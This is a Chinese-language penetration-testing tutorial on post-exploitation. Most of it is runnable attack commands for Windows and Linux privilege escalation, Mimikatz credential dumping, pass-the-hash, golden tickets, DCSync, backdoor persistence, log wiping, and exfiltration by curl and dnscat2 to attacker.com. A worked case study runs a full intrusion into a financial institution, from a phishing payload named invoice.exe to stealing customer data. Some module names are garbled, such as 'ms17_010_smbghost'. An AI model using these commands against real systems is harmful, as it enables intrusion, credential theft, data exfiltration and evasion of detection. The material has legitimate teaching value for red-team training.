Day-233-后渗透攻击技术详解

# Day 216: 后渗透攻击技术详解

> 渗透测试系列第 6 天 | 预计阅读时间：60 分钟 | 难度：★★★★★

---

## 清单 目录

1. [后渗透攻击概述](#后渗透攻击概述)
2. [后渗透攻击目标](#后渗透攻击目标)
3. [权限提升技术](#权限提升技术)
4. [凭证收集技术](#凭证收集技术)
5. [横向移动技术](#横向移动技术)
6. [域渗透技术](#域渗透技术)
7. [持久化技术](#持久化技术)
8. [数据收集与外传](#数据收集与外传)
9. [痕迹清理技术](#痕迹清理技术)
10. [后渗透实战案例](#后渗透实战案例)
11. [后渗透最佳实践](#后渗透最佳实践)
12. [总结与思考](#总结与思考)
13. [参考资料](#参考资料)

---

## 后渗透攻击概述

### 什么是后渗透攻击

后渗透攻击（Post-Exploitation）是指在成功利用漏洞获取初始访问权限后，为进一步达成攻击目标而进行的一系列操作。

**后渗透攻击的核心定义**：

```
┌─────────────────────────────────────────────────────────────┐
│              后渗透攻击定义                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  后渗透攻击 = 权限提升 + 凭证收集 + 横向移动 + 持久化      │
│                                                             │
│  关键阶段：                                                 │
│  1. 权限提升（Privilege Escalation）                        │
│     - 从普通用户到管理员/SYSTEM                             │
│     - 利用内核漏洞                                          │
│     - 滥用配置错误                                          │
│                                                             │
│  2. 凭证收集（Credential Harvesting）                       │
│     - 提取密码哈希                                          │
│     - 抓取明文密码                                          │
│     - 收集 Kerberos 票据                                    │
│                                                             │
│  3. 横向移动（Lateral Movement）                            │
│     - 在内网中移动                                          │
│     - 访问其他系统                                          │
│     - 扩大控制范围                                          │
│                                                             │
│  4. 持久化（Persistence）                                   │
│     - 建立后门                                              │
│     - 确保长期访问                                          │
│     - 抵抗系统重启                                          │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 后渗透攻击流程

```
┌─────────────────────────────────────────────────────────────┐
│              后渗透攻击流程                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  初始访问 → 权限提升 → 凭证收集 → 横向移动 → 持久化        │
│     ↓           ↓           ↓           ↓           ↓       │
│  Web Shell   本地提权    Mimikatz    PsExec      计划任务  │
│  漏洞利用    内核漏洞    Hash Dump   Pass-the-Hash 服务    │
│  钓鱼邮件    配置错误    Kerberos    WMI         注册表    │
│                                                             │
│  最终目标：                                                 │
│  ├── 数据窃取                                               │
│  ├── 系统破坏                                               │
│  ├── 勒索软件                                               │
│  └── APT 长期控制                                           │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 后渗透攻击目标

### 攻击目标分类

**按攻击目的分类**：

| 目标类型 | 说明 | 典型行为 |
|----------|------|----------|
| **数据窃取** | 获取敏感数据 | 数据库导出、文件收集 |
| **系统破坏** | 破坏业务连续性 | 删除数据、加密文件 |
| **经济利益** | 直接经济收益 | 勒索软件、金融欺诈 |
| **间谍活动** | 长期情报收集 | APT、持续监控 |
| **跳板攻击** | 攻击其他目标 | 代理转发、DDoS 跳板 |

**按攻击范围分类**：

```
┌─────────────────────────────────────────────────────────────┐
│              攻击范围分类                                   │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  单点攻击                                                   │
│  ├── 目标：单一系统                                        │
│  ├── 行为：获取权限、窃取数据                              │
│  └── 检测：相对容易                                        │
│                                                             │
│  内网渗透                                                   │
│  ├── 目标：整个内网                                        │
│  ├── 行为：横向移动、域渗透                                │
│  └── 检测：需要时间                                        │
│                                                             │
│  供应链攻击                                                 │
│  ├── 目标：上下游企业                                      │
│  ├── 行为：利用信任关系                                    │
│  └── 检测：困难                                            │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 权限提升技术

### Windows 权限提升

**信息收集**：

```powershell
# 系统信息
systeminfo
wmic os get Caption,Version,ServicePackVersionNumber

# 用户信息
whoami
whoami /priv
whoami /groups
net users
net localgroup administrators

# 进程信息
tasklist /v
tasklist /svc

# 服务信息
sc query
sc qc <service_name>

# 补丁信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"
wmic qfe get Caption,Description,HotFixID,InstalledOn

# 查找敏感文件
dir /s *password*
dir /s *credential*
type C:\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
```

**常见提权方法**：

```
┌─────────────────────────────────────────────────────────────┐
│              Windows 提权方法                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 内核漏洞提权                                            │
│     ├── MS17-010 (永恒之蓝)                                │
│     ├── CVE-2020-0796 (SMBGhost)                           │
│     ├── CVE-2021-40444 (MSHTML)                            │
│     └── CVE-2021-41379 (Installer)                         │
│                                                             │
│  2. 服务配置错误提权                                        │
│     ├── 弱权限服务二进制文件                               │
│     ├── 未引用的服务路径                                   │
│     └── 可写服务配置                                       │
│                                                             │
│  3. 注册表提权                                              │
│     ├── AlwaysInstallElevated                              │
│     ├── AutoLogon 密码                                     │
│     └── 可写注册表项                                       │
│                                                             │
│  4. 计划任务提权                                            │
│     ├── 可写计划任务                                       │
│     ├── 系统权限任务                                       │
│     └── 任务路径劫持                                       │
│                                                             │
│  5. 令牌 impersonation                                      │
│     ├── SeImpersonatePrivilege                             │
│     ├── Juicy Potato                                       │
│     └── Rotten Potato                                      │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**Metasploit 提权**：

```bash
# 使用 local_exploit_suggester
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run

# 使用 Windows 提权模块
msf6 > use exploit/windows/local/ms17_010_smbghost
msf6 > set SESSION 1
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > exploit

# 使用 bypassuac
msf6 > use exploit/windows/local/bypassuac
msf6 > set SESSION 1
msf6 > exploit
```

### Linux 权限提升

**信息收集**：

```bash
# 系统信息
uname -a
cat /etc/*release
cat /etc/issue

# 用户信息
whoami
id
cat /etc/passwd
cat /etc/shadow  # 需要 root

# 进程信息
ps aux
ps -ef

# 网络信息
ifconfig
netstat -tulpn
ss -tulpn

# 查找 SUID 文件
find / -perm -u=s -type f 2>/dev/null

# 查找可写文件
find / -writable -type f 2>/dev/null
find /etc -writable -type f 2>/dev/null

# 查找 cron 任务
cat /etc/crontab
ls -la /etc/cron.*

# 检查内核漏洞
./linux-exploit-suggester.sh
./linpeas.sh
```

**常见提权方法**：

```
┌─────────────────────────────────────────────────────────────┐
│              Linux 提权方法                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 内核漏洞提权                                            │
│     ├── Dirty COW (CVE-2016-5195)                          │
│     ├── PwnKit (CVE-2021-4034)                             │
│     ├── OverlayFS (CVE-2021-3493)                          │
│     └── eBPF (CVE-2021-3490)                               │
│                                                             │
│  2. SUID 提权                                               │
│     ├── find SUID                                          │
│     ├── vim SUID                                           │
│     ├── nmap SUID                                          │
│     └── python SUID                                        │
│                                                             │
│  3. Sudo 提权                                               │
│     ├── sudo -l 查看权限                                   │
│     ├── CVE-2019-14287                                     │
│     ├── CVE-2021-3156 (Baron Samedit)                      │
│     └── 配置错误利用                                       │
│                                                             │
│  4. Cron 提权                                               │
│     ├── 可写 cron 脚本                                      │
│     ├── PATH 劫持                                          │
│     └── 通配符注入                                         │
│                                                             │
│  5. PATH 劫持                                               │
│     ├── 查找使用相对路径的脚本                             │
│     ├── 创建恶意程序                                       │
│     └── 劫持执行                                           │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**SUID 提权示例**：

```bash
# 查找 SUID 文件
$ find / -perm -u=s -type f 2>/dev/null

# find SUID 提权
$ find . -exec /bin/sh -p \; -quit

# vim SUID 提权
$ vim -c ':!/bin/sh -p'

# nmap SUID 提权
$ nmap --interactive
nmap> !sh

# python SUID 提权
$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'

# bash SUID 提权
$ /bin/bash -p
```

---

## 凭证收集技术

### Windows 凭证收集

**Mimikatz 使用**：

```powershell
# 加载 Mimikatz
meterpreter > load kiwi

# 转储哈希
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1000:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef:::

# 抓取明文密码
meterpreter > creds_all
CORP\user1  Password123!

# Kerberos 票据
meterpreter > kerberos
meterpreter > kerberos_list
meterpreter > kerberos_ticket_use <ticket.kirbi>

# LSA 转储
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets
```

**Mimikatz 命令**：

```powershell
# 特权检查
mimikatz # privilege::debug

# 转储 LSASS
mimikatz # sekurlsa::logonpasswords

# 转储哈希
mimikatz # lsadump::sam
mimikatz # lsadump::secrets
mimikatz # lsadump::cache

# Kerberos 票据
mimikatz # kerberos::list
mimikatz # kerberos::ptt <ticket.kirbi>

# 黄金票据
mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500

# 白银票据
mimikatz # kerberos::silver /service:cifs /domain:corp.local /sid:S-1-5-21-xxx /rc4:hash
```

### Linux 凭证收集

**密码哈希收集**：

```bash
# 读取 /etc/shadow（需要 root）
$ cat /etc/shadow

# 读取 /etc/passwd
$ cat /etc/passwd

# 合并用于破解
$ unshadow /etc/passwd /etc/shadow > passwords.txt

# 使用 John the Ripper 破解
$ john passwords.txt

# 使用 Hashcat 破解
$ hashcat -m 1800 hashes.txt wordlist.txt
```

**SSH 密钥收集**：

```bash
# 查找 SSH 密钥
$ find / -name "id_rsa" 2>/dev/null
$ find / -name "id_dsa" 2>/dev/null
$ find / -name "*.pem" 2>/dev/null

# 读取用户 SSH 密钥
$ cat ~/.ssh/id_rsa
$ cat ~/.ssh/authorized_keys

# 查找 known_hosts
$ cat ~/.ssh/known_hosts

# 查找 SSH 配置
$ cat /etc/ssh/sshd_config
```

**历史命令收集**：

```bash
# 读取 bash 历史
$ cat ~/.bash_history
$ cat /root/.bash_history

# 读取其他 Shell 历史
$ cat ~/.zsh_history
$ cat ~/.fish_history

# 查找密码相关命令
$ grep -i "password" ~/.bash_history
$ grep -i "ssh" ~/.bash_history
$ grep -i "mysql" ~/.bash_history
```

### 浏览器凭证收集

```powershell
# Chrome 凭证
meterpreter > run post/windows/gather/credentials/chrome

# Firefox 凭证
meterpreter > run post/windows/gather/credentials/firefox

# 手动收集 Chrome
$ cat ~/.config/google-chrome/Default/Login\ Data

# 手动收集 Firefox
$ cat ~/.mozilla/firefox/*.default/logins.json
```

---

## 横向移动技术

### Pass-the-Hash

**PtH 攻击原理**：

```
┌─────────────────────────────────────────────────────────────┐
│              Pass-the-Hash 原理                             │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  正常认证：                                                 │
│  用户 → 输入密码 → 哈希 → 验证 → 访问                      │
│                                                             │
│  PtH 攻击：                                                 │
│  攻击者 → 获取哈希 → 直接使用哈希 → 访问                   │
│                                                             │
│  关键点：                                                   │
│  - 无需知道明文密码                                        │
│  - NTLM 哈希即可                                           │
│  - 适用于 Windows 环境                                     │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**PtH 实施**：

```bash
# 使用 Metasploit
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOST 192.168.1.20
msf6 > set SMBUser Administrator
msf6 > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > exploit

# 使用 Impacket
$ impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.1.20

# 使用 CrackMapExec
$ crackmapexec smb 192.168.1.20 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
```

### Pass-the-Ticket

**PtT 攻击原理**：

```
┌─────────────────────────────────────────────────────────────┐
│              Pass-the-Ticket 原理                           │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  Kerberos 票据类型：                                        │
│  ├── TGT (Ticket Granting Ticket)                          │
│  │   └── 用于获取服务票据                                  │
│  │                                                           │
│  └── TGS (Ticket Granting Service)                         │
│      └── 用于访问特定服务                                  │
│                                                             │
│  PtT 攻击：                                                 │
│  1. 窃取有效票据                                            │
│  2. 注入到当前会话                                          │
│  3. 访问目标服务                                            │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**PtT 实施**：

```powershell
# 使用 Mimikatz 导出票据
mimikatz # kerberos::list /export

# 使用 Mimikatz 注入票据
mimikatz # kerberos::ptt admin@CORP.LOCAL.kirbi

# 使用 Metasploit
meterpreter > run post/windows/gather/credentials/kerberos

# 验证票据
$ klist
$ klist tickets
```

### PsExec 横向移动

```bash
# 使用 Impacket PsExec
$ impacket-psexec Administrator@192.168.1.20
Password: P@ssw0rd123!

# 使用 PsExec（Windows）
$ psexec \\192.168.1.20 -u Administrator -p P@ssw0rd123! cmd

# 使用 CrackMapExec
$ crackmapexec smb 192.168.1.0/24 -u Administrator -p P@ssw0rd123! -x "whoami"
```

### WMI 横向移动

```bash
# 使用 Impacket WMIExec
$ impacket-wmiexec Administrator@192.168.1.20
Password: P@ssw0rd123!

# 使用 Metasploit
msf6 > use exploit/windows/smb/wmi_exec
msf6 > set RHOST 192.168.1.20
msf6 > set SMBUser Administrator
msf6 > set SMBPass P@ssw0rd123!
msf6 > exploit

# 使用原生 WMI
$ wmic /node:192.168.1.20 /user:Administrator /password:P@ssw0rd123! process call create "cmd.exe /c calc.exe"
```

### SSH 横向移动

```bash
# 使用 SSH 密钥
$ ssh -i id_rsa user@192.168.1.20

# 使用密码
$ ssh user@192.168.1.20
Password: P@ssw0rd123!

# 批量测试
$ for ip in 192.168.1.{1..254}; do ssh -o ConnectTimeout=1 user@$ip "whoami" 2>/dev/null && echo "Success: $ip"; done

# 使用私钥连接多台主机
$ for host in $(cat hosts.txt); do ssh -i id_rsa user@$host "command" 2>/dev/null; done
```

---

## 域渗透技术

### 域信息收集

```powershell
# 使用 PowerView
$ Get-Domain
$ Get-DomainController
$ Get-DomainUser
$ Get-DomainComputer
$ Get-DomainGroup
$ Get-DomainOU
$ Get-DomainGPO

# 使用 BloodHound
$ .\SharpHound.exe -c All

# 使用 Metasploit
meterpreter > run post/windows/gather/enum_domains
meterpreter > run post/windows/gather/enum_domain_users
meterpreter > run post/windows/gather/enum_domain_computers
```

### Kerberos 攻击

**黄金票据**：

```powershell
# 需要 krbtgt 哈希
mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt

# 参数说明：
# /user: 伪造的用户名
# /domain: 域名
# /sid: 域 SID
# /krbtgt: krbtgt 账户哈希
# /id: 用户 RID（500=Administrator）
# /ptt: 直接注入票据
```

**白银票据**：

```powershell
# 需要服务账户哈希
mimikatz # kerberos::silver /service:cifs /domain:corp.local /sid:S-1-5-21-xxx /rc4:hash /ptt

# 常见服务：
# cifs - 文件共享
# host - 主机服务
# ldap - 目录服务
# http - HTTP 服务
```

**Kerberoasting**：

```powershell
# 请求可破解的服务票据
$ Add-DomainSPNTarget -Identity "TargetUser" -ServicePrincipalName "test/service"

# 导出票据
$ Request-SPNTicket -SPN "MSSQLSvc/sql.corp.local"

# 使用 Hashcat 破解
$ hashcat -m 13100 ticket.hashcat wordlist.txt
```

### 域信任攻击

```
┌─────────────────────────────────────────────────────────────┐
│              域信任攻击                                     │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  域信任类型：                                               │
│  ├── 单向信任                                               │
│  ├── 双向信任                                               │
│  ├── 传递信任                                               │
│  └── 林信任                                                 │
│                                                             │
│  攻击方法：                                                 │
│  ├── 信任票证伪造                                           │
│  ├── SID 历史注入                                           │
│  └── 跨域横向移动                                           │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### DCSync 攻击

```powershell
# 使用 Mimikatz
mimikatz # lsadump::dcsync /user:CORP\krbtgt
mimikatz # lsadump::dcsync /user:CORP\Administrator

# 使用 Impacket
$ impacket-secretsdump -just-dc-user krbtgt CORP/Administrator:Password@192.168.1.10

# 需要权限：
# - Replicating Directory Changes
# - Replicating Directory Changes All
```

---

## 持久化技术

### Windows 持久化

**常见持久化方法**：

```
┌─────────────────────────────────────────────────────────────┐
│              Windows 持久化方法                             │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 注册表运行键                                            │
│     ├── HKLM\Software\Microsoft\Windows\CurrentVersion\Run │
│     ├── HKCU\Software\Microsoft\Windows\CurrentVersion\Run │
│     └── 系统启动时执行                                     │
│                                                             │
│  2. 计划任务                                                 │
│     ├── schtasks /create                                   │
│     ├── 系统启动时执行                                     │
│     └── 用户登录时执行                                     │
│                                                             │
│  3. 服务创建                                                 │
│     ├── sc create                                          │
│     ├── 系统服务级别                                       │
│     └── 高权限执行                                         │
│                                                             │
│  4. WMI 订阅                                                 │
│     ├── __EventFilter                                      │
│     ├── __EventConsumer                                    │
│     └── 难以检测                                           │
│                                                             │
│  5. DLL 劫持                                                 │
│     ├── 替换系统 DLL                                        │
│     ├── 程序启动时加载                                     │
│     └── 隐蔽性高                                           │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**Metasploit 持久化**：

```bash
# 使用 persistence 模块
meterpreter > run persistence -U -X -p 4444 -r 10.10.10.5

# 参数说明：
# -U: 用户启动时执行
# -X: 系统启动时执行
# -p: 监听端口
# -r: 监听地址

# 使用 metsvc
meterpreter > run metsvc

# 创建后门账户
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/add_user
```

**手动持久化**：

```powershell
# 注册表持久化
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# 计划任务持久化
schtasks /create /tn Backdoor /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM

# 服务持久化
sc create Backdoor binPath= "C:\backdoor.exe" start= auto
sc start Backdoor

# WMI 持久化
$ filterName = "WindowsUpdate"
$ consumerName = "UpdateConsumer"
$ command = "C:\backdoor.exe"

$ filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}

$ consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$command; CommandLineTemplate=$command}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$filter; Consumer=$consumer}
```

### Linux 持久化

**常见持久化方法**：

```
┌─────────────────────────────────────────────────────────────┐
│              Linux 持久化方法                               │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. cron 任务                                                │
│     ├── /etc/crontab                                       │
│     ├── /etc/cron.d/                                       │
│     └── 用户 cron                                          │
│                                                             │
│  2. 启动脚本                                                 │
│     ├── /etc/rc.local                                      │
│     ├── /etc/init.d/                                       │
│     └── systemd 服务                                       │
│                                                             │
│  3. Shell 配置                                               │
│     ├── ~/.bashrc                                          │
│     ├── ~/.profile                                         │
│     └── /etc/profile                                       │
│                                                             │
│  4. SSH 密钥                                                 │
│     ├── ~/.ssh/authorized_keys                             │
│     └── 后门账户                                           │
│                                                             │
│  5. LD_PRELOAD 劫持                                         │
│     ├── /etc/ld.so.preload                                 │
│     └── 库劫持                                             │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**手动持久化**：

```bash
# cron 持久化
$ echo "* * * * * root /backdoor.sh" >> /etc/crontab
$ echo "* * * * * /backdoor.sh" | crontab -

# systemd 服务
$ cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
After=network.target

[Service]
Type=simple
ExecStart=/backdoor.sh
Restart=always

[Install]
WantedBy=multi-user.target
EOF
$ systemctl enable backdoor
$ systemctl start backdoor

# SSH 密钥持久化
$ echo "ssh-rsa AAAA... attacker@kali" >> ~/.ssh/authorized_keys
$ echo "ssh-rsa AAAA... attacker@kali" >> /root/.ssh/authorized_keys

# Shell 配置持久化
$ echo "/backdoor.sh &" >> ~/.bashrc
$ echo "/backdoor.sh &" >> /etc/profile

# LD_PRELOAD 劫持
$ echo "/lib/backdoor.so" >> /etc/ld.so.preload
```

---

## 数据收集与外传

### 数据收集

**敏感数据定位**：

```powershell
# Windows 敏感数据
$ dir /s *password*
$ dir /s *credential*
$ dir /s *.xlsx *.docx *.pdf
$ dir /s financial* budget* contract*

# Linux 敏感数据
$ find / -name "*password*" 2>/dev/null
$ find / -name "*credential*" 2>/dev/null
$ find / -name "*.xlsx" -o -name "*.docx" -o -name "*.pdf" 2>/dev/null

# 数据库导出
$ mysqldump -u root -p database > dump.sql
$ pg_dump -U postgres database > dump.sql
```

**屏幕截图**：

```bash
# Metasploit 截图
meterpreter > screenshot

# Linux 截图
$ import screenshot.png
$ scrot screenshot.png

# Windows 截图
$ powershell -command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSCR}')"
```

**键盘记录**：

```bash
# Metasploit 键盘记录
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# Linux 键盘记录
$ xinput test  # 监听键盘事件
```

### 数据外传

**外传方法**：

```
┌─────────────────────────────────────────────────────────────┐
│              数据外传方法                                   │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. HTTP/HTTPS 传输                                         │
│     ├── curl/wget 上传                                     │
│     ├── Python 脚本                                        │
│     └── 隐蔽性中等                                         │
│                                                             │
│  2. DNS 隧道                                                 │
│     ├── dnscat2                                            │
│     ├── iodine                                             │
│     └── 隐蔽性高                                           │
│                                                             │
│  3. ICMP 隧道                                                │
│     ├── icmpsh                                             │
│     └── 隐蔽性高                                           │
│                                                             │
│  4. 云存储                                                   │
│     ├── Dropbox/Google Drive                               │
│     ├── AWS S3                                             │
│     └── 隐蔽性中等                                         │
│                                                             │
│  5. 邮件传输                                                 │
│     ├── 附件发送                                           │
│     └── 隐蔽性低                                           │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

**外传实施**：

```bash
# HTTP 上传
$ curl -X POST -F "file=@data.zip" http://attacker.com/upload

# DNS 隧道
$ dnscat2 --dns server=attacker.com --secret=secret

# ICMP 隧道
$ icmpsh -s 192.168.1.10 -d attacker.com

# 分卷压缩
$ zip -s 10m data.zip data/*
$ split -b 10m data.zip data.zip.

# 编码传输
$ base64 data.zip > data.b64
$ cat data.b64 | curl -X POST -d @- http://attacker.com/receive
```

---

## 痕迹清理技术

### Windows 痕迹清理

```powershell
# 清除事件日志
meterpreter > clearev

# 手动清除
$ wevtutil cl System
$ wevtutil cl Application
$ wevtutil cl Security

# 清除 PowerShell 历史
$ Remove-Item (Get-PSReadlineOption).HistorySavePath
$ Clear-History

# 清除最近文档
$ Remove-Item C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\* -Recurse

# 清除临时文件
$ Remove-Item C:\Users\*\AppData\Local\Temp\* -Recurse
$ Remove-Item C:\Windows\Temp\* -Recurse
```

### Linux 痕迹清理

```bash
# 清除命令历史
$ history -c
$ rm ~/.bash_history
$ ln -sf /dev/null ~/.bash_history

# 清除日志
$ truncate -s 0 /var/log/auth.log
$ truncate -s 0 /var/log/syslog
$ truncate -s 0 /var/log/secure
$ truncate -s 0 /var/log/messages

# 清除最后登录
$ touch -d "2020-01-01" /var/log/lastlog
$ utmpdump /var/log/wtmp > /tmp/wtmp
$ utmpdump /var/log/btmp > /tmp/btmp

# 清除临时文件
$ rm -rf /tmp/*
$ rm -rf /var/tmp/*
```

---

## 后渗透实战案例

### 案例背景

**目标**：某金融机构内网
**初始访问**：钓鱼邮件获取工作站权限
**目标**：获取核心数据库访问权限

### 攻击过程

#### 第 1 阶段：初始访问

```powershell
# 钓鱼邮件 Payload
$ msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.10.5 LPORT=4444 \
  -f exe -o invoice.exe

# 获取初始 Shell
meterpreter > getuid
Server username: CORP\user1

meterpreter > sysinfo
Computer: WORKSTATION-01
OS: Windows 10 (Build 19042)
```

#### 第 2 阶段：权限提升

```powershell
# 检查漏洞
meterpreter > run post/multi/recon/local_exploit_suggester

# 发现 MS17-010
meterpreter > use exploit/windows/local/ms17_010_smbghost
meterpreter > set SESSION 1
meterpreter > exploit

# 获取 SYSTEM 权限
meterpreter > getprivs
SeDebugPrivilege: enabled
SeTcbPrivilege: enabled
```

#### 第 3 阶段：凭证收集

```powershell
# 转储哈希
meterpreter > load kiwi
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

# 抓取明文密码
meterpreter > creds_all
CORP\user1  Password123!
CORP\admin  Admin@123456
```

#### 第 4 阶段：横向移动

```powershell
# 使用 PsExec 横向移动
$ impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.1.20

# 发现域控
meterpreter > run post/windows/gather/enum_domains
Domain: CORP
DC: dc01.corp.local (192.168.1.10)

# DCSync 攻击
$ impacket-secretsdump -just-dc-user krbtgt CORP/Administrator:Admin@123456@192.168.1.10
```

#### 第 5 阶段：域渗透

```powershell
# 黄金票据攻击
mimikatz # kerberos::golden /user:admin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:hash /id:500 /ptt

# 访问文件服务器
$ psexec \\fileserver.corp.local cmd

# 访问数据库服务器
$ psexec \\dbserver.corp.local cmd
```

#### 第 6 阶段：数据收集

```powershell
# 数据库导出
$ mysqldump -u root -p core_database > core_data.sql

# 文件收集
$ zip -r sensitive_data.zip /data/financial/ /data/customer/

# 分卷压缩
$ split -b 50M sensitive_data.zip sensitive_data.zip.
```

#### 第 7 阶段：数据外传

```bash
# DNS 隧道外传
$ dnscat2 --dns server=attacker.com --secret=secret

# 分批传输
$ for file in sensitive_data.zip.*; do base64 $file | curl -X POST -d @- http://attacker.com/receive; done
```

#### 第 8 阶段：持久化

```powershell
# 创建后门账户
$ net user backdoor P@ssw0rd123! /add
$ net localgroup administrators backdoor /add

# 计划任务
$ schtasks /create /tn WindowsUpdate /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM

# RDP 持久化
$ reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v RDPBackdoor /t REG_SZ /d "C:\rdp_backdoor.exe"
```

#### 第 9 阶段：痕迹清理

```powershell
# 清除事件日志
meterpreter > clearev

# 清除 PowerShell 历史
$ Remove-Item (Get-PSReadlineOption).HistorySavePath

# 清除临时文件
$ Remove-Item C:\Windows\Temp\* -Recurse
```

### 攻击总结

| 阶段 | 技术 | 成果 |
|------|------|------|
| 初始访问 | 钓鱼邮件 | 获取工作站 Shell |
| 权限提升 | MS17-010 | 获取 SYSTEM 权限 |
| 凭证收集 | Mimikatz | 获取域管理员凭证 |
| 横向移动 | PsExec、PtH | 控制多台服务器 |
| 域渗透 | DCSync、黄金票据 | 获取域控权限 |
| 数据收集 | 数据库导出 | 获取核心数据 |
| 数据外传 | DNS 隧道 | 成功外传数据 |
| 持久化 | 多种后门 | 维持长期访问 |
| 痕迹清理 | 日志清除 | 降低检测风险 |

---

## 后渗透最佳实践

### 测试清单

```
┌─────────────────────────────────────────────────────────────┐
│              后渗透测试清单                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  权限提升                                                   │
│  □ 系统信息收集                                             │
│  □ 内核漏洞检测                                             │
│  □ 服务配置检查                                             │
│  □ SUID/注册表检查                                          │
│                                                             │
│  凭证收集                                                   │
│  □ 哈希转储                                                 │
│  □ 明文密码抓取                                             │
│  □ Kerberos 票据收集                                        │
│  □ 浏览器凭证收集                                           │
│                                                             │
│  横向移动                                                   │
│  □ Pass-the-Hash 测试                                       │
│  □ Pass-the-Ticket 测试                                     │
│  □ PsExec/WMI 测试                                          │
│  □ SSH 密钥复用测试                                         │
│                                                             │
│  域渗透                                                     │
│  □ 域信息收集                                               │
│  □ Kerberoasting 测试                                       │
│  □ DCSync 测试                                              │
│  □ 黄金/白银票据测试                                        │
│                                                             │
│  持久化                                                     │
│  □ 注册表持久化测试                                         │
│  □ 计划任务测试                                             │
│  □ 服务创建测试                                             │
│  □ WMI 持久化测试                                           │
│                                                             │
│  数据收集                                                   │
│  □ 敏感数据定位                                             │
│  □ 数据库导出测试                                           │
│  □ 文件收集测试                                             │
│                                                             │
│  痕迹清理                                                   │
│  □ 日志清除测试                                             │
│  □ 历史命令清除测试                                         │
│  □ 临时文件清除测试                                         │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

### 工具组合

**推荐工具组合**：

```
┌─────────────────────────────────────────────────────────────┐
│              后渗透工具组合                                 │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  基础工具：                                                 │
│  ├── Metasploit（渗透框架）                                │
│  ├── Mimikatz（凭证收集）                                  │
│  ├── Impacket（横向移动）                                  │
│  └── PowerSploit（PowerShell 工具）                        │
│                                                             │
│  枚举工具：                                                 │
│  ├── BloodHound（域分析）                                  │
│  ├── PowerView（域枚举）                                   │
│  ├── LinPEAS（Linux 枚举）                                 │
│  └── WinPEAS（Windows 枚举）                               │
│                                                             │
│  持久化工具：                                               │
│  ├── Empire（后渗透框架）                                  │
│  ├── Cobalt Strike（红队平台）                             │
│  └── Sliver（C2 框架）                                     │
│                                                             │
└─────────────────────────────────────────────────────────────┘
```

---

## 总结与思考

### 核心要点回顾

1. **后渗透是渗透测试的核心价值**，决定最终攻击成果

2. **权限提升是基础**，获取高权限才能进行后续操作

3. **凭证收集是关键**，凭证是横向移动的通行证

4. **域渗透是目标**，控制域控等于控制整个内网

5. **痕迹清理是保障**，降低被发现和追溯的风险

### 深入思考

**问题 1：红队演练中后渗透的边界？**

我的观点：
- 明确授权范围
